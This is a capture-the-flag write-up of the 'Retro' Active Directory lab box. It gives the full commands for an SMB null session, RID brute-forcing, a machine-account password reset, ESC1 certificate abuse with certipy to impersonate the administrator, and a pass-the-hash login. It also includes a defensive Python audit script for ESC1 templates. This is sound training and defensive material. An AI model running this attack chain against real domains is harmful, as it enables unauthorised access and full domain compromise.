Retro - Writeup (VulnLab & HackTheBox)

shkz
3 min read
██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░

-----------------------------------------
Easy box: an SMB null session for the initial foothold,
RID brute-forcing for hints about a pre-created machine account,
a machine account password reset, and ESC1 abuse through ADCS to escalate to Domain Admin.

❄️ NMAP & INFO

53     → domain (Simple DNS Plus)  
88     → kerberos-sec (Microsoft Windows Kerberos)  
135    → msrpc (Microsoft Windows RPC)  
139    → netbios-ssn (Microsoft Windows netbios-ssn)  
389    → ldap (Microsoft Windows Active Directory LDAP)  
445    → microsoft-ds?  
464    → kpasswd5?  
593    → ncacn_http (Microsoft Windows RPC over HTTP 1.0)  
636    → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3268   → ldap (Microsoft Windows Active Directory LDAP)  
3269   → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3389   → ms-wbt-server (Microsoft Terminal Services)

❄️ FOOTHOLD

Since we don’t have any credentials yet, I started by brute-forcing Kerberos usernames with kerbrute, which revealed two valid accounts:

  • guest@retro.vl

  • administrator@retro.vl

An attempt at an RPC null session didn’t give me anything useful. So instead, I tried an SMB null session, this time assuming the guest account might allow anonymous access.

The Trainees share looks interesting: we have Read permissions on it:

SMB | Null Session

Using smbclient.py:

smbclient.py DC.retro.vl/guest:''@10.129.172.145

After reading the note in the SMB share, I enumerated domain accounts by RID brute-forcing with netexec:

nxc smb 10.129.172.145 -u guest -p '' --rid-brute

I built a list of possible usernames from the RID output and ran a password brute-force against them, which gave me valid credentials.

SMB | Trainee | flag.txt

Enumerating again with the newly obtained credentials gives access to a new share called Notes, where we have read permissions. Connecting via SMB, we find two files:

  • user.txt (our flag.txt)

  • ToDo.txt

Bloodhound Time

After reading the ToDo.txt file, I ran bloodhound-python to collect and visualize the objects in the AD:

bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip

Based on the hint mentioning an old pre-created machine account, I found a computer object named BANKING.RETRO.VL.

Knowing that machine account names follow the format BANKING$ and that pre-created accounts often keep a default password, I tested a few common passwords with a brute-force:

After reading that post, I learned that the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT error means the machine account’s password was reset or left at a default (such as its lowercase name) when it was pre-created or reset in AD, so the account is out of sync and no longer trusted by the domain.

By running:

changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr

I was able to change the machine account password successfully. Impacket’s changepasswd.py lets you change an account’s password over LDAP, kpasswd, SMB, or RPC. Both the SMB and RPC methods use the SAMR protocol, but since we can’t access the IPC$ share with the default password (as already seen), we go with rpc-samr, which doesn’t require an SMB session setup.

ADCS | PrivEsc

After reviewing BloodHound again and changing the password for BANKING$, I enumerated with netexec to check for ADCS and see whether any templates could be abused.

The result confirms there’s a PKI Enrollment Server at DC.retro.vl, and the Certificate Authority is retro-DC-CA.

ADCS | Finding Vulnerable Certificates

By running:

certipy find -vulnerable -u BANKING$@DC.retro.vl -p "<REDACTED>" -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout
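The `find -vulnerable` run above is Certipy applying the ESC1 conditions to every published template. As an added example (not part of the writeup and not Certipy’s code), the audit below implements those same conditions in plain Python so a defender can run them over template attributes exported from the Configuration partition and see exactly which condition makes a template dangerous. The field names mirror the LDAP attributes of a certificate template; the two sample templates are constructed for illustration and are not the real RetroClients template.

```python
"""Audit certificate templates for the five ESC1 conditions.

Added example: takes template records shaped like the attributes of objects
under CN=Certificate Templates,CN=Public Key Services,CN=Services in the
Configuration partition. Sample data is constructed, not exported from a
real domain.
"""

# Flag bits from the msPKI-* attributes (documented in MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: CA manager approval

# EKUs that allow a certificate to be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Groups whose enrollment right effectively makes the template open to everyone.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_conditions(template):
    """Return a dict mapping each ESC1 condition to whether the template meets it."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return {
        # The requester can put an arbitrary UPN/SAN in the CSR.
        "enrollee_supplies_subject": bool(
            template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
        ),
        # No EKU at all behaves like Any Purpose, so it also counts.
        "auth_eku": (not ekus) or bool(ekus & AUTH_EKUS),
        # Requests are issued immediately instead of pending for a CA manager.
        "no_manager_approval": not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        # No enrollment-agent signature is required on the request.
        "no_ra_signature": template.get("msPKI-RA-Signature", 0) == 0,
        # A low-privileged group holds the Enroll right.
        "low_priv_enroll": bool(set(template["enrollment-rights"]) & LOW_PRIV_PRINCIPALS),
    }


def is_esc1(template):
    """A template is ESC1-vulnerable only when every condition holds."""
    return all(esc1_conditions(template).values())


def remediate(template):
    """Return a copy of the template with the two CA-side settings a defender
    would normally change: stop trusting the requester's subject and require
    CA manager approval. (Assumed remediation, not from the writeup.)"""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed


# Constructed sample templates (illustrative values only).
SAMPLE_TEMPLATES = [
    {
        "name": "ExampleVulnerable",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["Domain Computers", "Domain Admins"],
    },
    {
        # Subject is built from AD, so a requester cannot pick a UPN.
        "name": "ExampleSafe",
        "msPKI-Certificate-Name-Flag": 0,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["Domain Users"],
    },
]


def audit(templates=SAMPLE_TEMPLATES):
    """Return the names of templates that satisfy all ESC1 conditions."""
    return [t["name"] for t in templates if is_esc1(t)]


if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        failing = [k for k, v in esc1_conditions(t).items() if v]
        print(f"{t['name']}: ESC1={is_esc1(t)} conditions met={failing}")
```

Run it on the template attributes you exported and every name returned by `audit()` is a template where a low-privileged requester can ask for a certificate with an arbitrary UPN and have it issued without review; `remediate()` shows the two attribute changes that close that path on the template itself.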

ESC1 Abuse

Now we can abuse ESC1 using certipy like this:

certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096

Then I extracted the administrator’s NT hash from the issued certificate and logged in as administrator via evil-winrm:

evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt

Pwned!


Written by

shkz

I am shkz, a Security Researcher, Red Team and CTF Player.